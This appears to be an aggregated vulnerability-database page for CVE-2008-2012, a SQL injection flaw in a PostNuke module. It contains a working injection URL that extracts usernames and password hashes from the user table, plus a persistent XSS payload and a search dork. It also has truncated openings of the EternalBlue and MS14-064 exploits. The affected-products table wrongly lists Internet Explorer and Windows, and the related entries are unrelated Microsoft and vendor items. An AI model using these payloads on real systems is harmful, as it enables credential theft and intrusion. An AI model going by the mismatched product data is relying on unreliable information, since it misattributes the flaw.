CVE-2008-2012
Published 2008-04-30
Priority P338 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 1.10% · 61.6th percentile
SQL injection vulnerability in index.php in the PostSchedule 1.0 module for PostNuke allows remote attackers to execute arbitrary SQL commands via the eid parameter in an event action.
Affected
33 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| msrc | internet_explorer_10 | — | — |
| msrc | internet_explorer_11 | — | — |
| msrc | internet_explorer_11_on_windows_10_for_32-bit_systems | — | — |
| msrc | internet_explorer_11_on_windows_10_for_x64-based_systems | — | — |
| msrc | internet_explorer_9 | — | — |
| msrc | windows_10 | — | — |
| msrc | windows_10_version_1607 | — | — |
| msrc | windows_10_version_1809 | — | — |
| msrc | windows_10_version_1909 | — | — |
| msrc | windows_10_version_2004 | — | — |
| msrc | windows_10_version_20h2 | — | — |
| msrc | windows_10_version_21h1 | — | — |
| msrc | windows_10_version_21h2 | — | — |
| msrc | windows_10_version_22h2 | — | — |
| msrc | windows_11_version_21h2 | — | — |
| msrc | windows_11_version_22h2 | — | — |
| msrc | windows_11_version_23h2 | — | — |
| msrc | windows_11_version_24h2 | — | — |
| msrc | windows_11_version_25h2 | — | — |
| msrc | windows_7 | — | — |
| msrc | windows_8.1 | — | — |
| msrc | windows_rt_8.1 | — | — |
| msrc | windows_server_2008 | — | — |
| msrc | windows_server_2008_r2 | — | — |
| msrc | windows_server_2012 | — | — |
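CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vendor_msrc | — | 8.8 | HIGH | — |
| vendor_redhat | — | 5.0 | MEDIUM | — |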
GHSA
GHSA-fqcv-fqmq-f4vv: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-01
CVE-2008-2012 [HIGH] CWE-89 GHSA-fqcv-fqmq-f4vv: SQL injection vulnerability in index
SQL injection vulnerability in index.php in the PostSchedule 1.0 module for PostNuke allows remote attackers to execute arbitrary SQL commands via the eid parameter in an event action.
Microsoft
MapUrlToZone Security Feature Bypass Vulnerability
vendor_msrc·2025-01-14·CVSS 4.3
CVE-2025-21332 [MEDIUM] CWE-41 MapUrlToZone Security Feature Bypass Vulnerability
FAQ: The Security Updates table indicates that this vulnerability affects all supported versions of Microsoft Windows. Why are IE Cumulative updates listed for Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, and Windows Server 2012 R2?
While Microsoft has announced retirement of the Internet Explorer 11 application on certain platforms and the Microsoft Edge Legacy application is deprecated, the underlying MSHTML, EdgeHTML, and scripting platforms are still supported. The MSHTML platform is used by Internet Explorer mode in Microsoft Edge as well as other applications through WebBrowser control. The EdgeHTML platform is used by WebView and some UWP applications. The scripting platforms are used by MSHTML and EdgeHTML but
Microsoft
Internet Explorer Security Feature Bypass Vulnerability
vendor_msrc·2016-05-10·CVSS 8.8
CVE-2016-0188 [HIGH] Internet Explorer Security Feature Bypass Vulnerability
Description: A security feature bypass vulnerability exists when Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies. The vulnerability could allow an attacker to bypass Device Guard UMCI policies.
To exploit the vulnerability, a user could either visit a malicious website or an attacker with access to the system could run a specially crafted application. An attacker could then leverage the vulnerability to run unsigned malicious code as though it were signed by a trusted source.
The update addresses the vulnerability by correcting how Internet Explorer validates UMCI policies.
FAQ: I am running Internet Explorer on Windows Server 2008, Windows Server 2008 R2, Windows Server 2012, or Windows Server 2012 R2.
Red Hat
boost regular expression memory corruption flaws
vendor_redhat·2008-01-11·CVSS 5.0
CVE-2008-0171 [MEDIUM] boost regular expression memory corruption flaws
regex/v4/perl_matcher_non_recursive.hpp in the Boost regex library (aka Boost.Regex) in Boost 1.33 and 1.34 allows context-dependent attackers to cause a denial of service (failed assertion and crash) via an invalid regular expression.
Statement: This issue did not affect the version of boost as shipped with Red Hat Enterprise Linux 4 and 6. This issue was addressed in boost packages in Red Hat Enterprise Linux 5 via RHSA-2012:0305.
No detection rules found.
Exploit-DB
BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting
exploitdb·2019-08-12·CVSS 4.3
CVE-2014-4035 [MEDIUM] BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting
---
# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Date: Wed Jun 4 2014
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035
Vulnerability
[+]Method:POST
1.http://URL/hotel-booking/booking_details.php (;persistent XSS)
allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=
every parameter injectable :)
Exploit-DB
Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution
exploitdb·2019-03-13·CVSS 8.8
CVE-2019-0541 [HIGH] Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution
---
# Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execution Vulnerability
# Google Dork: N/A
# Date: March, 13 2019
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://www.microsoft.com/
# Software Link: http://www.microsoft.com/
# Version: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.
# Tested on: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.
# CVE : CVE-2019-0541
The Microsoft Windows MSHTML Engine is prone to a vulnerability that allows attackers to execute arbitrar
Exploit-DB
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
exploitdb·2017-07-11
CVE-2017-0144 Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
---
#!/usr/bin/python
from impacket import smb, smbconnection
from mysmb import MYSMB
from struct import pack, unpack, unpack_from
import sys
import socket
import time
'''
MS17-010 exploit for Windows 2000 and later by sleepya
EDB Note: mysmb.py can be found here ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42315.py
Note:
- The exploit should never crash a target (chance should be nearly 0%)
- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1
Exploit-DB
Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)
exploitdb·2014-11-14
CVE-2014-6352 Microsoft Windows - OLE Package Manager Code Execution (MS14-064) (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms
such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known
to be vulnerable. However, based on our testing, the most reliable setup is on Windows
pla
Exploit-DB
PostNuke Module PostSchedule 1.0 - 'eid' SQL Injection
exploitdb·2008-04-25
CVE-2008-2012 PostNuke Module PostSchedule 1.0 - 'eid' SQL Injection
---
Vuln: Postnuke Mod PostSchedule SQL Vuln
Author: Vuln search Kacper (kacper1964_at_yahoo.pl)
google:"PostSchedule ver 1"
Vuln:
index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
$Severo:
The tables may vary, e.g. pn_users, nuke_users, etc.
Homepage: http://devilteam.pl/
# milw0rm.com [2008-04-25]
Unit42
Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
blogs_unit42·2020-07-21·CVSS 10.0
CVE-2020-1350 [CRITICAL] Threat Brief: Microsoft DNS Server Wormable Vulnerability CVE-2020-1350
## Executive Summary
In July 2020, Microsoft released a security update, CVE-2020-1350 | Windows DNS Server Remote Code Execution Vulnerability, for a new remote code execution (RCE) vulnerability.
This vulnerability exists within the Microsoft Windows Domain Name System (DNS) Server due to the improper handling of certain types of requests, specifically over port 53/TCP. Exploitation of this vulnerability is possible by creating an integer overflow, potentially leading to remote code execution.
This vulnerability only affects Windows DNS and the following builds of the Microsoft Windows operating system (OS):
- Windows Server 2008/2008 R2
- Windows Server 2012/2012 R2
- Windows Server 2016
- Windows Server 2019
- Windows Server version 1803/1903/1909/2004 (Server Core installation)
Qualys
July Patch Tuesday: 19 Critical Vulnerabilities from Microsoft, plus Critical Adobe Patches
blogs_qualys·2017-07-11·CVSS 7.8
CVE-2017-8589 [HIGH] July Patch Tuesday: 19 Critical Vulnerabilities from Microsoft, plus Critical Adobe Patches
Today Microsoft released patches covering 54 vulnerabilities as part of July’s Patch Tuesday update, with 26 of them affecting Windows. Patches covering 19 of these vulnerabilities are labeled as Critical, all of which can result in Remote Code execution. According to Microsoft, none of these vulnerabilities are currently being exploited in the wild.
Top priority for patching should go to CVE-2017-8589, which is a vulnerability in the Windows Search service. This vulnerability can be exploited remotely via SMB to take complete control of a system, and can impact both servers and workstations. The issue affects Windows Server 2016, 2012, 2008 R2, 2008 as well as desktop systems like Windows 10, 7 and 8.1. While this vulnerability can leverage SMB as an attack vector, this is not a vulnera
Fortinet
iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
blogs_fortinet·2017-03-23·CVSS 8.1
CVE-2017-0104 [HIGH] iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
FORTIGUARD LABS THREAT RESEARCH
iSNS Server Memory Corruption Vulnerability in Microsoft Windows Server
By Honggang Ren | March 23, 2017
Summary
In November 2016, as part of my FortiGuard research work, I discovered and reported on an iSNS server memory corruption vulnerability in Microsoft Windows Server. On Patch Tuesday of March 2017, Microsoft released the Security Bulletin MS17-012 that contains the fix for this vulnerability and identifies it as CVE-2017-0104.
This vulnerability could lead to remote code execution, and is rated as critical by Microsoft. The vulnerability affects Windows Server 2008, 2012, and 2016 versions. Microsoft recommends installing this update immediately.
In this blog I will share the details of this vulnerability.
How to Reproduce
To reproduce the vulne